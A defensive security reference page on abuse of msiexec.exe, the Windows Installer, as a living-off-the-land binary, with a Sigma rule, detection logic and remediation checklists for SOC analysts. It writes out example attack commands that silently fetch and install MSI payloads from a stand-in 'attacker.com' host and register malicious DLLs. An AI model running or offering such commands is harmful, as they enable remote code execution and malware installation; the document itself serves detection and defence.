msiexec.exeSYSTEM UTILITYmsiexec.exe - Windows Installer LOLBin Security Analysis
msiexec.exe is the **Windows Installer** executable for installing, modifying, and removing MSI packages. It is a **potent LOLBin** that can **execute code from remote URLs**, install malicious packages silently, and bypass application controls. Attackers abuse msiexec to download and execute payloads from web servers.
Risk Summary
CRITICAL priority for SOC triage. msiexec.exe can execute MSI packages from remote URLs, enabling download-and-execute attacks. Monitor for /i with HTTP/HTTPS URLs, /q silent flags, and unusual package sources. Remote MSI execution is almost always malicious.
Overview
What is msiexec.exe?
msiexec.exe is the Windows Installer service executable.
Core Functions
Package Installation:
- Install MSI packages
- Uninstall applications
- Repair installations
- Administrative installs
Security Significance
- LOLBin Status: Execute from URL
- Silent Install: /q flags hide activity
- Trusted Binary: Microsoft signed
- Elevated Execution: Often runs elevated
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\msiexec.exe |
| Parent | services.exe, explorer.exe |
| User | SYSTEM or current user |
| Context | Software installation |
Legitimate Usage
msiexec /i package.msi
msiexec /x {GUID}
msiexec /a package.msi
Common Locations
C:\Windows\System32\msiexec.exeC:\Windows\SysWOW64\msiexec.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Command: msiexec /i C:\Install\app.msi
msiexec /x {ProductGUID}
Source: Local file, network share
Context: Software deployment
SUSPICIOUS
Command: msiexec /i http://attacker.com/mal.msi /q
msiexec /q /i https://...
Source: Internet URL
Flags: /q (silent), /qn (no UI)
Dangerous Parameters
| Parameter | Risk | Description |
|---|---|---|
| /i http:// | CRITICAL | Remote execution |
| /q, /qn | HIGH | Silent install |
| /y | HIGH | DLL registration |
Abuse Techniques
Attack Techniques
Technique #1: Remote MSI Execution (T1218.007)
Download and Execute:
msiexec /q /i http://attacker.com/payload.msi
msiexec /q /i https://attacker.com/malware.msi
Technique #2: DLL Registration (T1218.007)
msiexec /y malicious.dll
msiexec /z malicious.dll
Technique #3: Silent Malware Install
msiexec /i malware.msi /qn /norestart
Technique #4: MSI with Embedded Payloads
MSI packages containing:
- Custom actions executing code
- Embedded executables
- Script payloads
Detection Guidance
Detection Strategies
Priority #1: Remote MSI Execution (CRITICAL)
Sigma Rule:
title: Msiexec Remote Package Install
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\msiexec.exe'
CommandLine|contains:
- 'http://'
- 'https://'
condition: selection
level: critical
Priority #2: Silent Installation
Process = "msiexec.exe" AND
CommandLine CONTAINS ["/q", "/qn", "/quiet"] AND
CommandLine CONTAINS "/i"
→ ALERT: HIGH - Silent installation
Priority #3: DLL Operations
Process = "msiexec.exe" AND
CommandLine CONTAINS ["/y", "/z"]
→ ALERT: HIGH - DLL registration
Remediation Steps
Protection and Remediation
Defense: Block Remote MSI
Use AppLocker to block msiexec with URL parameters.
Defense: Software Restriction
Limit MSI installation to approved packages.
If Compromise Suspected
- Identify the MSI package installed
- Check installation source (URL?)
- Review installed programs
- Check for persistence
- Analyze MSI contents
Investigation Checklist
Investigation Checklist
- Review full command line
- Check for HTTP/HTTPS URLs
- Identify silent install flags
- Locate MSI package
- Analyze MSI custom actions
- Check installed software list
- Review for persistence mechanisms